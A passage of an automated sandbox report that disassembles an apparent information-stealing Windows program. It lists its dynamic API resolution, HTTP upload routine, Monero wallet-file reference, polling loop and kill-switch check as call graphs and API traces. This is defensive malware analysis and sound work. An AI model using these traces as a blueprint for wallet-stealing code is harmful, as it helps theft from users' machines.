                                      • Instruction Fuzzy Hash: 94D09E7594430CABCB14DFE099896EDBB7CBB08715F100659DD0576280EB315495CA65
                                      Function 00129F20 Relevance: 222.9, APIs: 112, Strings: 15, Instructions: 684libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 129f20-129f2a 634 129f30-12a341 GetProcAddress * 43 633->634 635 12a346-12a3da LoadLibraryA * 8 633->635 634->635 636 12a456-12a45d 635->636 637 12a3dc-12a451 GetProcAddress * 5 635->637 638 12a463-12a521 GetProcAddress * 8 636->638 639 12a526-12a52d 636->639 637->636 638->639 640 12a5a8-12a5af 639->640 641 12a52f-12a5a3 GetProcAddress * 5 639->641 642 12a647-12a64e 640->642 643 12a5b5-12a642 GetProcAddress * 6 640->643 641->640 644 12a654-12a72a GetProcAddress * 9 642->644 645 12a72f-12a736 642->645 643->642 644->645 646 12a7b2-12a7b9 645->646 647 12a738-12a7ad GetProcAddress * 5 645->647 648 12a7bb-12a7e7 GetProcAddress * 2 646->648 649 12a7ec-12a7f3 646->649 647->646 648->649 650 12a825-12a82c 649->650 651 12a7f5-12a820 GetProcAddress * 2 649->651 652 12a922-12a929 650->652 653 12a832-12a91d GetProcAddress * 10 650->653 651->650 654 12a92b-12a988 GetProcAddress * 4 652->654 655 12a98d-12a994 652->655 653->652 654->655 656 12a996-12a9a9 GetProcAddress 655->656 657 12a9ae-12a9b5 655->657 656->657 658 12a9b7-12aa13 GetProcAddress * 4 657->658 659 12aa18-12aa19 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(76210000,00E265D8), ref: 00129F3D
                                      • GetProcAddress.KERNEL32(76210000,00E26778), ref: 00129F55
                                      • GetProcAddress.KERNEL32(76210000,00E39888), ref: 00129F6E
                                      • GetProcAddress.KERNEL32(76210000,00E39810), ref: 00129F86
                                      • GetProcAddress.KERNEL32(76210000,00E39858), ref: 00129F9E
                                      • GetProcAddress.KERNEL32(76210000,00E3D910), ref: 00129FB7
                                      • GetProcAddress.KERNEL32(76210000,00E2A738), ref: 00129FCF
                                      • GetProcAddress.KERNEL32(76210000,00E3D880), ref: 00129FE7
                                      • GetProcAddress.KERNEL32(76210000,00E3D9A0), ref: 0012A000
                                      • GetProcAddress.KERNEL32(76210000,00E3D8E0), ref: 0012A018
                                      • GetProcAddress.KERNEL32(76210000,00E3D958), ref: 0012A030
                                      • GetProcAddress.KERNEL32(76210000,00E265F8), ref: 0012A049
                                      • GetProcAddress.KERNEL32(76210000,00E266B8), ref: 0012A061
                                      • GetProcAddress.KERNEL32(76210000,00E26798), ref: 0012A079
                                      • GetProcAddress.KERNEL32(76210000,00E26538), ref: 0012A092
                                      • GetProcAddress.KERNEL32(76210000,00E3D970), ref: 0012A0AA
                                      • GetProcAddress.KERNEL32(76210000,00E3D838), ref: 0012A0C2
                                      • GetProcAddress.KERNEL32(76210000,00E2A9E0), ref: 0012A0DB
                                      • GetProcAddress.KERNEL32(76210000,00E266D8), ref: 0012A0F3
                                      • GetProcAddress.KERNEL32(76210000,00E3D778), ref: 0012A10B
                                      • GetProcAddress.KERNEL32(76210000,00E3D988), ref: 0012A124
                                      • GetProcAddress.KERNEL32(76210000,00E3D7F0), ref: 0012A13C
                                      • GetProcAddress.KERNEL32(76210000,00E3D8F8), ref: 0012A154
                                      • GetProcAddress.KERNEL32(76210000,00E26858), ref: 0012A16D
                                      • GetProcAddress.KERNEL32(76210000,00E3DA48), ref: 0012A185
                                      • GetProcAddress.KERNEL32(76210000,00E3D928), ref: 0012A19D
                                      • GetProcAddress.KERNEL32(76210000,00E3D7D8), ref: 0012A1B6
                                      • GetProcAddress.KERNEL32(76210000,00E3D898), ref: 0012A1CE
                                      • GetProcAddress.KERNEL32(76210000,00E3D850), ref: 0012A1E6
                                      • GetProcAddress.KERNEL32(76210000,00E3D940), ref: 0012A1FF
                                      • GetProcAddress.KERNEL32(76210000,00E3D808), ref: 0012A217
                                      • GetProcAddress.KERNEL32(76210000,00E3D8B0), ref: 0012A22F
                                      • GetProcAddress.KERNEL32(76210000,00E3DA60), ref: 0012A248
                                      • GetProcAddress.KERNEL32(76210000,00E2FD28), ref: 0012A260
                                      • GetProcAddress.KERNEL32(76210000,00E3D820), ref: 0012A278
                                      • GetProcAddress.KERNEL32(76210000,00E3D9B8), ref: 0012A291
                                      • GetProcAddress.KERNEL32(76210000,00E26618), ref: 0012A2A9
                                      • GetProcAddress.KERNEL32(76210000,00E3D9D0), ref: 0012A2C1
                                      • GetProcAddress.KERNEL32(76210000,00E26738), ref: 0012A2DA
                                      • GetProcAddress.KERNEL32(76210000,00E3DA00), ref: 0012A2F2
                                      • GetProcAddress.KERNEL32(76210000,00E3D868), ref: 0012A30A
                                      • GetProcAddress.KERNEL32(76210000,00E267B8), ref: 0012A323
                                      • GetProcAddress.KERNEL32(76210000,00E267D8), ref: 0012A33B
                                      • LoadLibraryA.KERNEL32(00E3D8C8,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A34D
                                      • LoadLibraryA.KERNEL32(00E3D7A8,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A35E
                                      • LoadLibraryA.KERNEL32(00E3D9E8,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A370
                                      • LoadLibraryA.KERNEL32(00E3DA18,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A382
                                      • LoadLibraryA.KERNEL32(00E3DA30,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A393
                                      • LoadLibraryA.KERNEL32(00E3D790,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A3A5
                                      • LoadLibraryA.KERNEL32(00E3D7C0,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A3B7
                                      • LoadLibraryA.KERNEL32(00E3DA78,?,00125EF3,00130AEB,?,?,?,?,?,?,?,?,?,?,00130AEA,00130AE7), ref: 0012A3C8
                                      • GetProcAddress.KERNEL32(751E0000,00E261B8), ref: 0012A3EA
                                      • GetProcAddress.KERNEL32(751E0000,00E3DC10), ref: 0012A402
                                      • GetProcAddress.KERNEL32(751E0000,00E391B0), ref: 0012A41A
                                      • GetProcAddress.KERNEL32(751E0000,00E3DBE0), ref: 0012A433
                                      • GetProcAddress.KERNEL32(751E0000,00E262B8), ref: 0012A44B
                                      • GetProcAddress.KERNEL32(700F0000,00E2A760), ref: 0012A470
                                      • GetProcAddress.KERNEL32(700F0000,00E262D8), ref: 0012A489
                                      • GetProcAddress.KERNEL32(700F0000,00E2A8A0), ref: 0012A4A1
                                      • GetProcAddress.KERNEL32(700F0000,00E3DCD0), ref: 0012A4B9
                                      • GetProcAddress.KERNEL32(700F0000,00E3DB68), ref: 0012A4D2
                                      • GetProcAddress.KERNEL32(700F0000,00E263F8), ref: 0012A4EA
                                      • GetProcAddress.KERNEL32(700F0000,00E261D8), ref: 0012A502
                                      • GetProcAddress.KERNEL32(700F0000,00E3DB80), ref: 0012A51B
                                      • GetProcAddress.KERNEL32(753A0000,00E26478), ref: 0012A53C
                                      • GetProcAddress.KERNEL32(753A0000,00E26438), ref: 0012A554
                                      • GetProcAddress.KERNEL32(753A0000,00E3DCA0), ref: 0012A56D
                                      • GetProcAddress.KERNEL32(753A0000,00E3DB98), ref: 0012A585
                                      • GetProcAddress.KERNEL32(753A0000,00E260F8), ref: 0012A59D
                                      • GetProcAddress.KERNEL32(76310000,00E2AA08), ref: 0012A5C3
                                      • GetProcAddress.KERNEL32(76310000,00E2AA30), ref: 0012A5DB
                                      • GetProcAddress.KERNEL32(76310000,00E3DAA8), ref: 0012A5F3
                                      • GetProcAddress.KERNEL32(76310000,00E262F8), ref: 0012A60C
                                      • GetProcAddress.KERNEL32(76310000,00E26318), ref: 0012A624
                                      • GetProcAddress.KERNEL32(76310000,00E2AA80), ref: 0012A63C
                                      • GetProcAddress.KERNEL32(76910000,00E3DC70), ref: 0012A662
                                      • GetProcAddress.KERNEL32(76910000,00E26358), ref: 0012A67A
                                      • GetProcAddress.KERNEL32(76910000,00E391D0), ref: 0012A692
                                      • GetProcAddress.KERNEL32(76910000,00E3DCB8), ref: 0012A6AB
                                      • GetProcAddress.KERNEL32(76910000,00E3DD48), ref: 0012A6C3
                                      • GetProcAddress.KERNEL32(76910000,00E26378), ref: 0012A6DB
                                      • GetProcAddress.KERNEL32(76910000,00E26458), ref: 0012A6F4
                                      • GetProcAddress.KERNEL32(76910000,00E3DD00), ref: 0012A70C
                                      • GetProcAddress.KERNEL32(76910000,00E3DC40), ref: 0012A724
                                      • GetProcAddress.KERNEL32(75B30000,00E26158), ref: 0012A746
                                      • GetProcAddress.KERNEL32(75B30000,00E3DC28), ref: 0012A75E
                                      • GetProcAddress.KERNEL32(75B30000,00E3DB20), ref: 0012A776
                                      • GetProcAddress.KERNEL32(75B30000,00E3DB50), ref: 0012A78F
                                      • GetProcAddress.KERNEL32(75B30000,00E3DC88), ref: 0012A7A7
                                      • GetProcAddress.KERNEL32(75670000,00E26498), ref: 0012A7C8
                                      • GetProcAddress.KERNEL32(75670000,00E261F8), ref: 0012A7E1
                                      • GetProcAddress.KERNEL32(76AC0000,00E26338), ref: 0012A802
                                      • GetProcAddress.KERNEL32(76AC0000,00E3DD60), ref: 0012A81A
                                      • GetProcAddress.KERNEL32(6F4E0000,00E264B8), ref: 0012A840
                                      • GetProcAddress.KERNEL32(6F4E0000,00E263D8), ref: 0012A858
                                      • GetProcAddress.KERNEL32(6F4E0000,00E26418), ref: 0012A870
                                      • GetProcAddress.KERNEL32(6F4E0000,00E3DD18), ref: 0012A889
                                      • GetProcAddress.KERNEL32(6F4E0000,00E260D8), ref: 0012A8A1
                                      • GetProcAddress.KERNEL32(6F4E0000,00E26118), ref: 0012A8B9
                                      • GetProcAddress.KERNEL32(6F4E0000,00E26138), ref: 0012A8D2
                                      • GetProcAddress.KERNEL32(6F4E0000,00E26178), ref: 0012A8EA
                                      • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0012A901
                                      • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0012A917
                                      • GetProcAddress.KERNEL32(75AE0000,00E3DB08), ref: 0012A939
                                      • GetProcAddress.KERNEL32(75AE0000,00E39220), ref: 0012A951
                                      • GetProcAddress.KERNEL32(75AE0000,00E3DB38), ref: 0012A969
                                      • GetProcAddress.KERNEL32(75AE0000,00E3DBC8), ref: 0012A982
                                      • GetProcAddress.KERNEL32(76300000,00E26198), ref: 0012A9A3
                                      • GetProcAddress.KERNEL32(6E9A0000,00E3DCE8), ref: 0012A9C4
                                      • GetProcAddress.KERNEL32(6E9A0000,00E26398), ref: 0012A9DD
                                      • GetProcAddress.KERNEL32(6E9A0000,00E3DA90), ref: 0012A9F5
                                      • GetProcAddress.KERNEL32(6E9A0000,00E3DD30), ref: 0012AA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: 8a$8c$8d$8e$8g$HttpQueryInfoA$InternetSetOptionA$Xa$Xc$Xd$Xh$xa$xc$xd$xg
                                      • API String ID: 2238633743-3472937861
                                      • Opcode ID: c3afbbe1a9ec9cb92f53cffc612cf8b76d9aff11be5ff2c639654cff37ebcf93
                                      • Instruction ID: 4128a5deee73131d88c079048dc315a4e97d792d72236a03cf303f91fcddbfe2
                                      • Opcode Fuzzy Hash: c3afbbe1a9ec9cb92f53cffc612cf8b76d9aff11be5ff2c639654cff37ebcf93
                                      • Instruction Fuzzy Hash: AF624CB55182809FC366DFA8FDC995677BDE78D341B108B1ABA09CB2F0D734A941CB60
                                      Function 001148D0 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479networkstringfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 801 1148d0-114992 call 12aab0 call 114800 call 12aa50 * 5 InternetOpenA StrCmpCA 816 114994 801->816 817 11499b-11499f 801->817 816->817 818 1149a5-114b1d call 128cf0 call 12ac30 call 12abb0 call 12ab10 * 2 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12ac30 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12ac30 call 12abb0 call 12ab10 * 2 InternetConnectA 817->818 819 114f1b-114f43 InternetCloseHandle call 12ade0 call 11a210 817->819 818->819 905 114b23-114b27 818->905 829 114f82-114ff2 call 128b20 * 2 call 12aab0 call 12ab10 * 8 819->829 830 114f45-114f7d call 12ab30 call 12acc0 call 12abb0 call 12ab10 819->830 830->829 906 114b35 905->906 907 114b29-114b33 905->907 908 114b3f-114b72 HttpOpenRequestA 906->908 907->908 909 114b78-114e78 call 12acc0 call 12abb0 call 12ab10 call 12ac30 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12ac30 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12ac30 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12acc0 call 12abb0 call 12ab10 call 12ac30 call 12abb0 call 12ab10 call 12aa50 call 12ac30 * 2 call 12abb0 call 12ab10 * 2 call 12ade0 lstrlen call 12ade0 * 2 lstrlen call 12ade0 HttpSendRequestA 908->909 910 114f0e-114f15 InternetCloseHandle 908->910 1021 114e82-114eac InternetReadFile 909->1021 910->819 1022 114eb7-114f09 InternetCloseHandle call 12ab10 1021->1022 1023 114eae-114eb5 1021->1023 1022->910 1023->1022 1024 114eb9-114ef7 call 12acc0 call 12abb0 call 12ab10 1023->1024 1024->1021
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 00114800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00114889
                                        • Part of subcall function 00114800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00114899
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00114965
                                      • StrCmpCA.SHLWAPI(?,00E3F970), ref: 0011498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00114B0A
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00130DDE,00000000,?,?,00000000,?,",00000000,?,00E3FA80), ref: 00114E38
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00114E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00114E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00114E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00114EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00114F15
                                      • HttpOpenRequestA.WININET(00000000,00E3F920,?,00E3F0E0,00000000,00000000,00400100,00000000), ref: 00114B65
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00114F1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------$X
                                      • API String ID: 460715078-4062443838
                                      • Opcode ID: df6035774cc05f685d4a0a26228a564ac0a9ad4fdd24f52c5c462419ea384185
                                      • Instruction ID: 8c06e83878eaca095ce37d88c6b1b694cb99ecf35b86fa06198c03be26145108
                                      • Opcode Fuzzy Hash: df6035774cc05f685d4a0a26228a564ac0a9ad4fdd24f52c5c462419ea384185
                                      • Instruction Fuzzy Hash: 1712BB72911128ABCB15EB90EDA2FEEB379BF24300F904599B10676191EF706F58CF61
                                      Function 00125760 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1033 125760-1257c7 call 125d20 call 12ab30 * 3 call 12aa50 * 4 1049 1257cc-1257d3 1033->1049 1050 125827-12589c call 12aa50 * 2 call 111590 call 125510 call 12abb0 call 12ab10 call 12ade0 StrCmpCA 1049->1050 1051 1257d5-125806 call 12ab30 call 12aab0 call 111590 call 125440 1049->1051 1077 1258e3-1258f9 call 12ade0 StrCmpCA 1050->1077 1081 12589e-1258de call 12aab0 call 111590 call 125440 call 12abb0 call 12ab10 1050->1081 1067 12580b-125822 call 12abb0 call 12ab10 1051->1067 1067->1077 1082 1258ff-125906 1077->1082 1083 125a2c-125a94 call 12abb0 call 12ab30 * 2 call 1116b0 call 12ab10 * 4 call 111670 call 111550 1077->1083 1081->1077 1086 125a2a-125aaf call 12ade0 StrCmpCA 1082->1086 1087 12590c-125913 1082->1087 1213 125d13-125d16 1083->1213 1106 125be1-125c49 call 12abb0 call 12ab30 * 2 call 1116b0 call 12ab10 * 4 call 111670 call 111550 1086->1106 1107 125ab5-125abc 1086->1107 1091 125915-125969 call 12ab30 call 12aab0 call 111590 call 125440 call 12abb0 call 12ab10 1087->1091 1092 12596e-1259e3 call 12aa50 * 2 call 111590 call 125510 call 12abb0 call 12ab10 call 12ade0 StrCmpCA 1087->1092 1091->1086 1092->1086 1192 1259e5-125a25 call 12aab0 call 111590 call 125440 call 12abb0 call 12ab10 1092->1192 1106->1213 1113 125ac2-125ac9 1107->1113 1114 125bdf-125c64 call 12ade0 StrCmpCA 1107->1114 1122 125b23-125b98 call 12aa50 * 2 call 111590 call 125510 call 12abb0 call 12ab10 call 12ade0 StrCmpCA 1113->1122 1123 125acb-125b1e call 12ab30 call 12aab0 call 111590 call 125440 call 12abb0 call 12ab10 1113->1123 1143 125c66-125c71 Sleep 1114->1143 1144 125c78-125ce1 call 12abb0 call 12ab30 * 2 call 1116b0 call 12ab10 * 4 call 111670 call 111550 1114->1144 1122->1114 1218 125b9a-125bda call 12aab0 call 111590 call 125440 call 12abb0 call 12ab10 1122->1218 1123->1114 1143->1049 1144->1213 1192->1086 1218->1114
                                      APIs
                                        • Part of subcall function 0012AB30: lstrlen.KERNEL32(00114F55,?,?,00114F55,00130DDF), ref: 0012AB3B
                                        • Part of subcall function 0012AB30: lstrcpy.KERNEL32(00130DDF,00000000), ref: 0012AB95
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00125894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001258F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00125AA7
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 00125440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00125478
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 00125510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00125568
                                        • Part of subcall function 00125510: lstrlen.KERNEL32(00000000), ref: 0012557F
                                        • Part of subcall function 00125510: StrStrA.SHLWAPI(00000000,00000000), ref: 001255B4
                                        • Part of subcall function 00125510: lstrlen.KERNEL32(00000000), ref: 001255D3
                                        • Part of subcall function 00125510: lstrlen.KERNEL32(00000000), ref: 001255FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001259DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00125B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00125C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00125C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: 8h$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-4046243713
                                      • Opcode ID: 50a9947d1d36242798682453ff1b346b95d8f278a7b379529e66956c2e2ffbea
                                      • Instruction ID: 7b0c2876f4c203bae1cb0657a7b1a06efb187d1219933a8377e0b887617fef35
                                      • Opcode Fuzzy Hash: 50a9947d1d36242798682453ff1b346b95d8f278a7b379529e66956c2e2ffbea
                                      • Instruction Fuzzy Hash: 16E114719101189BCB18FBA0FDA7AFD737EAF74340F908568B50667091EF346A68CB52
                                      Function 001219F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1301 1219f0-121a1d call 12ade0 StrCmpCA 1304 121a27-121a41 call 12ade0 1301->1304 1305 121a1f-121a21 ExitProcess 1301->1305 1309 121a44-121a48 1304->1309 1310 121c12-121c1d call 12ab10 1309->1310 1311 121a4e-121a61 1309->1311 1312 121a67-121a6a 1311->1312 1313 121bee-121c0d 1311->1313 1315 121a71-121a80 call 12ab30 1312->1315 1316 121a99-121aa8 call 12ab30 1312->1316 1317 121b1f-121b30 StrCmpCA 1312->1317 1318 121bdf-121be9 call 12ab30 1312->1318 1319 121afd-121b0e StrCmpCA 1312->1319 1320 121b82-121b93 StrCmpCA 1312->1320 1321 121b63-121b74 StrCmpCA 1312->1321 1322 121bc0-121bd1 StrCmpCA 1312->1322 1323 121b41-121b52 StrCmpCA 1312->1323 1324 121ba1-121bb2 StrCmpCA 1312->1324 1325 121a85-121a94 call 12ab30 1312->1325 1326 121acf-121ae0 StrCmpCA 1312->1326 1327 121aad-121abe StrCmpCA 1312->1327 1313->1309 1315->1313 1316->1313 1344 121b32-121b35 1317->1344 1345 121b3c 1317->1345 1318->1313 1342 121b10-121b13 1319->1342 1343 121b1a 1319->1343 1350 121b95-121b98 1320->1350 1351 121b9f 1320->1351 1348 121b80 1321->1348 1349 121b76-121b79 1321->1349 1332 121bd3-121bd6 1322->1332 1333 121bdd 1322->1333 1346 121b54-121b57 1323->1346 1347 121b5e 1323->1347 1329 121bb4-121bb7 1324->1329 1330 121bbe 1324->1330 1325->1313 1340 121ae2-121aec 1326->1340 1341 121aee-121af1 1326->1341 1338 121ac0-121ac3 1327->1338 1339 121aca 1327->1339 1329->1330 1330->1313 1332->1333 1333->1313 1338->1339 1339->1313 1355 121af8 1340->1355 1341->1355 1342->1343 1343->1313 1344->1345 1345->1313 1346->1347 1347->1313 1348->1313 1349->1348 1350->1351 1351->1313 1355->1313
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00121A15
                                      • ExitProcess.KERNEL32 ref: 00121A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
